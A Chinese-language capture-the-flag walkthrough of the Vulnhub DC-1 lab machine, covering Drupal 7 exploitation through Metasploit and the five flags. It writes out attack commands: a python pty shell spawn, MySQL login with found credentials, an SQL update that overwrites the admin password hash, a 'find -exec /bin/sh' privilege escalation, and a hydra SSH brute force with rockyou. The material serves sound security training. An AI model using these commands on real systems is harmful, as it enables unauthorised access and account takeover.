【CTF】靶机:DC-1

简介: 本靶机适合初学者进行练习,适合已经了解渗透流程,有整体思路的初学者进行学习。本文将从头讲解,并配有视频教程。

靶机下载地址
https://pan.baidu.com/s/1wABv88zDc5lpjhCWvBhvfg 
提取码:5yq7
复制这段内容打开「百度网盘APP 即可获取」
视频教程可以去B站找我
https://www.bilibili.com/video/BV1xN4y1V7Kq?spm_id_from=333.999.0.0&vd_source=5eafc44fe61140563af1835db061815b

DC-1安装非常简单,下载后将.ova 文件导入虚拟机即可
101

注意导入后将虚拟机的网络模式由桥接模式改为NAT模式

那么,我们开始吧!

首先,我们要找到靶机ip

102

然后进行端口扫描
dc03

我们不妨访问下靶机IP地址,并使用wappalyer识别网站程序为Drupal 7
dc104

此时我们就可以去https://www.exploit-db.com/查看相关漏洞
dc105

随后,我们启用Metasploit进行漏洞搜索,选择较新日期且等级优秀的
dc106

使用我们中意的1号,并查看相关内容

dc107

之后设置被监听主机ip,并进行利用
python -c 'import pty;pty.spawn("/bin/bash")'
获取交互shell
dc109

找到flag1
dc109
flag1提示Every good CMS needs a config file - and so do you.
提示
下一个flag在CMS的config文件里面
经过简单摸索
我们找到了配置文件settings.php
cd110
于是我们在此文件找到了flag2
/**

  • flag2
  • Brute force and dictionary attacks aren't the
  • only ways to gain access (and you WILL need access).
  • What can you do with these credentials?

*/
flag2 提示我们暴力破解并不是获取访问权限的方式
而在flag2下我们看到了数据库信息
于是我们进行连接数据库操作
连接语句为
mysql -u dbuser -pR0ck3t

111dc

之后我们获取数据库敏感信息
select version(); \查看数据库版本
select database(); \查看当前数据库
show databases; \查看数据库信息
use drupaldb; \选定数据库
select database(); \查看当前数据库
show tables; \查看数据库的表
select * from users;
\q \退出
1dc1111

dc11112

下来我们在官网查询到哈希密码的加密文件
https://www.drupal.org/node/1023428
13312
我们利用password脚本对我们需要的密码进行加密
结果出现报错
gs
报错中指出,'/var/www/scripts/includes/password.inc'文件找不到,但是刚才发现,includes目录并不在scripts目录下,因此会报错。
使用命令 cp -r ../includes ./ 复制整个includes目录至scripts目录,再次执行,成功对admin007加密
得到对应密文$S$Dq7ooC2R4E/hC3HIoEBV3Cw1QMRnULsFzAn8M1NaW3OLO9cLeUw9
然后进入数据库更新admin密码
update users set pass='$S$DfBIXCmF.dJ5Ky2bWAMukxpsipRCGvQmXC.jnlUMbGIbySLzw7a0' where name='admin';
之后,成功进入后台,得到flag3
sfb
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
flag3指出: 特殊权限是需要用到 find 和 -exec 命令,也提到了shadow。就是说提权的话,需要用到以上两个命令,以及shadow文件。
于是,我们尝试查看shadow文件,提示权限不够
那么我们开始提权

以find为例

  • -name 按文件名查找
  • -exec 对匹配对象执行的命令,以;结束

但(;)是特殊字符需要转义(\)。
so
find -name 文件名 -exec /bin/sh \;
nb
成功拿到权限
之后我们查看shadow文件

法一:这是我最开始使用的
看到flag4后果断切换到flag4用户
cdflag4
然后就拿到了 flag4
这个方法更简单些,不知道算不算原创小技巧
不过显然这么做绝对不是出题人想看到的,hhh
fina1
ok,拿到finalflag!!!

法二:
下面是官方解法
看到flag4用户后
我们用hydra进行爆破
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.226.134
nbnb
得到flag4为orange
然后操作思路同法一

目录
相关文章
|
安全 搜索推荐 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
385 0
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
|
1天前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
20 0
|
2天前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
18 0
|
5月前
|
安全 关系型数据库 MySQL
DC-1靶机渗透(教程以及思路)
DC-1靶机渗透(教程以及思路)
68 0
|
6月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
146 0
|
6月前
|
存储 SQL 安全
VulnHub靶机DC3渗透笔记
Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five86.com/downloads/DC-3-2.zip
87 1
VulnHub靶机DC3渗透笔记
|
6月前
|
安全 Shell 数据库
Vulnhub靶机DC-1渗透笔记
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/
62 2
Vulnhub靶机DC-1渗透笔记
|
7月前
|
安全 Shell PHP
Kira CTF靶机
Kira CTF靶机
64 0
|
6月前
|
存储 网络协议 Shell
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
41 0
VulnHub靶机DC2渗透测试笔记
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
180 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)